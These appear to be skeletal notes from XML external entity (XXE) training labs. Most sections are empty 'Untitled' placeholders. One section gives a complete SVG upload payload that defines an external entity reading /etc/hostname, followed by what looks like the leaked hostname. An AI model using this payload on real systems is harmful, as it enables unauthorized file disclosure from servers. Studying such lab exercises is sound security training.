Exploiting XXE using external entities to retrieve files

Untitled

Exploiting XXE to perform SSRF attacks

Untitled

Lab: Exploiting XInclude to retrieve files

Untitled

Exploiting XXE via image file upload

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="<http://www.w3.org/2000/svg>" xmlns:xlink="<http://www.w3.org/1999/xlink>" version="1.1">
	<text font-size="16" x="0" y="16">&xxe;</text>
</svg>

f7dbe7963014

Lab: Blind XXE with out-of-band interaction

Untitled

Untitled